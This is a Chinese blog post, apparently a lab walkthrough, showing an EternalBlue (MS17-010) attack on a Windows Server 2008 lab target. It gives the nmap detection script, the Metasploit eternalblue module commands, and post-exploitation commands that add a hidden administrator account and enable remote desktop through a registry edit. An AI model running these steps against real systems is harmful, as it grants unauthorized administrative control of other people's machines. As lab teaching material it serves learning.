<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.0.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.0.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.0.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.0.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.0.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.0.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="永恒之蓝介绍​      1.恶意代码会扫描开放445和139文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 ​       2.漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说，比如在Intel Pentium芯片中">
<meta property="og:type" content="article">
<meta property="og:title" content="永恒之蓝攻击靶场">
<meta property="og:url" content="http://yoursite.com/2019/03/23/New-Page-1/index.html">
<meta property="og:site_name" content="FyJIANCHI">
<meta property="og:description" content="永恒之蓝介绍​      1.恶意代码会扫描开放445和139文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 ​       2.漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说，比如在Intel Pentium芯片中">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/03/23/New-Page-1/nmap1.png">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/nmap1.png">
<meta property="og:image" content="http://yoursite.com/2019/03/23/New-Page-1/nmap2.jpg">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/nmap2.jpg">
<meta property="og:image" content="http://yoursite.com/2019/03/23/New-Page-1/mete.png">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/mete.png">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/mete1.jpg">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/mete3.jpg">
<meta property="og:image" content="http://yoursite.com/2019/03/23/New-Page-1/rdesktop.jpg">
<meta property="og:image" content="g:/hexo/source/_posts/New-Page-1/rdesktop.jpg">
<meta property="og:updated_time" content="2019-03-24T08:02:04.981Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="永恒之蓝攻击靶场">
<meta name="twitter:description" content="永恒之蓝介绍​      1.恶意代码会扫描开放445和139文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 ​       2.漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说，比如在Intel Pentium芯片中">
<meta name="twitter:image" content="http://yoursite.com/2019/03/23/New-Page-1/nmap1.png">






  <link rel="canonical" href="http://yoursite.com/2019/03/23/New-Page-1/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>永恒之蓝攻击靶场 | FyJIANCHI</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">FyJIANCHI</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Navigationsleiste an/ausschalten">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Startseite</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archiv</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/23/New-Page-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="After all, we all like to pretend, just like I love you.">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="FyJIANCHI">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">永恒之蓝攻击靶场

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Erstellt: 2019-03-23 17:19:34" itemprop="dateCreated datePublished" datetime="2019-03-23T17:19:34+08:00">2019-03-23</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Bearbeitet am</span>
                
                <time title="Geändert am: 2019-03-24 16:02:04" itemprop="dateModified" datetime="2019-03-24T16:02:04+08:00">2019-03-24</time>
              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<h1 id="永恒之蓝介绍"><a href="#永恒之蓝介绍" class="headerlink" title="永恒之蓝介绍"></a>永恒之蓝介绍</h1><p>​      1.恶意代码会扫描开放445和139文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和<a href="https://www.baidu.com/s?wd=%E6%9C%8D%E5%8A%A1%E5%99%A8&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" target="_blank" rel="noopener">服务器</a>中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</p>
<p>​       2.漏洞是在<a href="https://baike.baidu.com/item/%E7%A1%AC%E4%BB%B6/479446" target="_blank" rel="noopener">硬件</a>、<a href="https://baike.baidu.com/item/%E8%BD%AF%E4%BB%B6/12053" target="_blank" rel="noopener">软件</a>、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的<a href="https://baike.baidu.com/item/%E6%83%85%E5%86%B5/1392364" target="_blank" rel="noopener">情况</a>下访问或破坏系统。具体举例来说，比如在Intel Pentium芯片中存在的逻辑错误，在Sendmail早期版本中的<a href="https://baike.baidu.com/item/%E7%BC%96%E7%A8%8B/139828" target="_blank" rel="noopener">编程</a>错误，在NFS协议中认证方式上的弱点，在Unix<a href="https://baike.baidu.com/item/%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%91%98" target="_blank" rel="noopener">系统管理员</a>设置匿名Ftp服务时配置不当的问题都可能被攻击者使用，威胁到系统的安全。因而这些都可以认为是系统中存在的<a href="https://baike.baidu.com/item/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/2890124" target="_blank" rel="noopener">安全漏洞</a>。</p>
<a id="more"></a>
<h2 id="1、-漏洞与具体系统环境之间的关系及其时间相关特性"><a href="#1、-漏洞与具体系统环境之间的关系及其时间相关特性" class="headerlink" title="1、 漏洞与具体系统环境之间的关系及其时间相关特性"></a><strong>1、 漏洞与具体系统环境之间的关系及其时间相关特性</strong></h2><p>​        漏洞会影响到很大范围的软<a href="https://baike.baidu.com/item/%E7%A1%AC%E4%BB%B6" target="_blank" rel="noopener">硬件</a>设备，包括作系统本身及其支撑<a href="https://baike.baidu.com/item/%E8%BD%AF%E4%BB%B6" target="_blank" rel="noopener">软件</a>，网络客户和<a href="https://baike.baidu.com/item/%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%BD%AF%E4%BB%B6" target="_blank" rel="noopener">服务器软件</a>，<a href="https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E8%B7%AF%E7%94%B1%E5%99%A8" target="_blank" rel="noopener">网络路由器</a>和安全<a href="https://baike.baidu.com/item/%E9%98%B2%E7%81%AB%E5%A2%99" target="_blank" rel="noopener">防火墙</a>等。换而言之，在这些不同的软<a href="https://baike.baidu.com/item/%E7%A1%AC%E4%BB%B6" target="_blank" rel="noopener">硬件</a>设备中都可能存在不同的<a href="https://baike.baidu.com/item/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E" target="_blank" rel="noopener">安全漏洞</a>问题。在不同种类的软、<a href="https://baike.baidu.com/item/%E7%A1%AC%E4%BB%B6" target="_blank" rel="noopener">硬件</a>设备，同种设备的不同版本之间，由不同设备构成的不同系统之间，以及同种系统在不同的设置条件下，都会存在各自不同的<a href="https://baike.baidu.com/item/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E" target="_blank" rel="noopener">安全漏洞</a>问题。</p>
<h2 id="2、漏洞的危害及防范"><a href="#2、漏洞的危害及防范" class="headerlink" title="2、漏洞的危害及防范"></a><strong>2、漏洞的危害及防范</strong></h2><p>漏洞的存在，很容易导致<a href="https://baike.baidu.com/item/%E9%BB%91%E5%AE%A2" target="_blank" rel="noopener">黑客</a>的侵入及病毒的驻留，会导致数据丢失和篡改、隐私泄露乃至金钱上的损失，如：网站因漏洞被入侵，网站用户数据将会泄露、网站功能可能遭到破坏而中止乃至服务器本身被入侵者控制。目前数码产品发展，漏洞从过去以电脑为载体延伸至数码平台，如手机<a href="https://baike.baidu.com/item/%E4%BA%8C%E7%BB%B4%E7%A0%81" target="_blank" rel="noopener">二维码</a>漏洞，<a href="https://baike.baidu.com/item/%E5%AE%89%E5%8D%93" target="_blank" rel="noopener">安卓</a><a href="https://baike.baidu.com/item/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F" target="_blank" rel="noopener">应用程序</a>漏洞等等…</p>
<h1 id="使用Nmap对漏洞进行扫描"><a href="#使用Nmap对漏洞进行扫描" class="headerlink" title="使用Nmap对漏洞进行扫描"></a><strong>使用Nmap对漏洞进行扫描</strong></h1><h2 id="1-Nmap的简介"><a href="#1-Nmap的简介" class="headerlink" title="1. Nmap的简介"></a>1. Nmap的简介</h2><p>​       Nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。</p>
<h2 id="2-Nmap的功能"><a href="#2-Nmap的功能" class="headerlink" title="2. Nmap的功能"></a>2. Nmap的功能</h2><p>​       其基本功能有三个，一是探测一组主机是否在线；其次是扫描 主机端口，<a href="https://baike.baidu.com/item/%E5%97%85%E6%8E%A2" target="_blank" rel="noopener">嗅探</a>所提供的网络服务；还可以推断主机所用的操作系统 。Nmap可用于扫描仅有两个节点的LAN，直至500个节点以上的网络。Nmap 还允许用户定制扫描技巧。通常，一个简单的使用<a href="https://baike.baidu.com/item/ICMP%E5%8D%8F%E8%AE%AE" target="_blank" rel="noopener">ICMP协议</a>的ping操作可以满足一般需求；也可以深入探测UDP或者TCP端口，直至<a href="https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA" target="_blank" rel="noopener">主机</a>所 使用的操作系统；还可以将所有探测结果记录到各种格式的日志中， 供进一步分析操作。</p>
<h2 id="3、环境搭建"><a href="#3、环境搭建" class="headerlink" title="3、环境搭建"></a><strong>3、环境搭建</strong></h2><p>目标靶机：windows2008Server(存在MS17_010漏洞)</p>
<p><a href="https://www.baidu.com/s?wd=%E6%93%8D%E4%BD%9C%E6%9C%BA&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" target="_blank" rel="noopener">操作机</a>系统：Kali linux</p>
<p>攻击机IP:192.168.28.136</p>
<p>靶机IP: 192.168.28.128  windows server 2008</p>
<h3 id="3-1-在本地查找ms17-010"><a href="#3-1-在本地查找ms17-010" class="headerlink" title="3.1 在本地查找ms17-010"></a>3.1 在本地查找ms17-010</h3><img src="/2019/03/23/New-Page-1/nmap1.png">
<p><img src="G:\hexo\source\_posts\New-Page-1\nmap1.png" alt></p>
<h3 id="3-2-使用nmap对靶机进行扫描"><a href="#3-2-使用nmap对靶机进行扫描" class="headerlink" title="3.2 使用nmap对靶机进行扫描"></a>3.2 使用nmap对靶机进行扫描</h3><p>输入命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/usr/share/nmap/scripts# nmap --script smb-vuln-ms17-010 192.168.28.128</span><br></pre></td></tr></table></figure>
<img src="/2019/03/23/New-Page-1/nmap2.jpg">
<p><img src="G:\hexo\source\_posts\New-Page-1\nmap2.jpg" alt></p>
<h3 id="3-3-使用Metasploit对目标进行监听"><a href="#3-3-使用Metasploit对目标进行监听" class="headerlink" title="3.3 使用Metasploit对目标进行监听"></a>3.3 使用Metasploit对目标进行监听</h3><p>输入<code>msfconsole</code>启动Metasploit<br>在Metasploit中，输入<code>search ms17-010</code>查找永恒之蓝漏洞</p>
<img src="/2019/03/23/New-Page-1/mete.png">
<p><img src="G:\hexo\source\_posts\New-Page-1\mete.png" alt></p>
<p>输入<code>use exploit/windows/smb/ms17_010_eternalblue</code>执行漏洞<br>输入<code>show options</code>查看当前攻击配置</p>

<p><img src="G:\hexo\source\_posts\New-Page-1\mete1.jpg" alt></p>
<p>将配置中第一行的<code>RHOST</code>修改为靶机IP地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set rhost 192.168.28.128</span><br></pre></td></tr></table></figure>
<p>修改完查看配置，配置完成后，使用 <code>run</code> 命令直接执行。</p>

<p><img src="G:\hexo\source\_posts\New-Page-1\mete3.jpg" alt></p>
<p>在命令中直接可以输入<code>whoami</code>当前登录的用户</p>
<h3 id="3-4-在靶机创建用户并赋予管理员权限"><a href="#3-4-在靶机创建用户并赋予管理员权限" class="headerlink" title="3.4 在靶机创建用户并赋予管理员权限"></a>3.4 在靶机创建用户并赋予管理员权限</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user username password /add</span><br><span class="line">net localgroup administrators username /add</span><br></pre></td></tr></table></figure>
<h3 id="3-5-开启3389端口并使用远程桌面登录"><a href="#3-5-开启3389端口并使用远程桌面登录" class="headerlink" title="3.5 开启3389端口并使用远程桌面登录"></a>3.5 开启3389端口并使用远程桌面登录</h3><p>在命令行中输入<code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</code>并执行，即可打开3389端口 ，此时我们新建一个终端，输入<code>rdesktop 192.168.28.128</code>登录远程桌面。</p>
<img src="/2019/03/23/New-Page-1/rdesktop.jpg">
<p><img src="G:\hexo\source\_posts\New-Page-1\rdesktop.jpg" alt></p>
<p>此时我们选择其他用户并使用刚才创建的用户登录，稍等便能登录到Windows桌面了。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/22/New-Page/" rel="next" title="SSH服务器连接到kali">
                <i class="fa fa-chevron-left"></i> SSH服务器连接到kali
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/23/New-Page-2/" rel="prev" title="搭建LAMP环境">
                搭建LAMP环境 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <div class="site-description motion-element" itemprop="description">After all, we all like to pretend, just like I love you.</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">5</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#永恒之蓝介绍"><span class="nav-number">1.</span> <span class="nav-text">永恒之蓝介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、-漏洞与具体系统环境之间的关系及其时间相关特性"><span class="nav-number">1.1.</span> <span class="nav-text">1、 漏洞与具体系统环境之间的关系及其时间相关特性</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、漏洞的危害及防范"><span class="nav-number">1.2.</span> <span class="nav-text">2、漏洞的危害及防范</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#使用Nmap对漏洞进行扫描"><span class="nav-number">2.</span> <span class="nav-text">使用Nmap对漏洞进行扫描</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-Nmap的简介"><span class="nav-number">2.1.</span> <span class="nav-text">1. Nmap的简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-Nmap的功能"><span class="nav-number">2.2.</span> <span class="nav-text">2. Nmap的功能</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、环境搭建"><span class="nav-number">2.3.</span> <span class="nav-text">3、环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-在本地查找ms17-010"><span class="nav-number">2.3.1.</span> <span class="nav-text">3.1 在本地查找ms17-010</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-使用nmap对靶机进行扫描"><span class="nav-number">2.3.2.</span> <span class="nav-text">3.2 使用nmap对靶机进行扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-3-使用Metasploit对目标进行监听"><span class="nav-number">2.3.3.</span> <span class="nav-text">3.3 使用Metasploit对目标进行监听</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-4-在靶机创建用户并赋予管理员权限"><span class="nav-number">2.3.4.</span> <span class="nav-text">3.4 在靶机创建用户并赋予管理员权限</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-5-开启3389端口并使用远程桌面登录"><span class="nav-number">2.3.5.</span> <span class="nav-text">3.5 开启3389端口并使用远程桌面登录</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  

  
</div>


  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Design – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.0.1</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=7.0.1"></script>

  <script src="/js/src/motion.js?v=7.0.1"></script>



  
  


  <script src="/js/src/schemes/muse.js?v=7.0.1"></script>



  
  <script src="/js/src/scrollspy.js?v=7.0.1"></script>
<script src="/js/src/post-details.js?v=7.0.1"></script>



  


  <script src="/js/src/next-boot.js?v=7.0.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
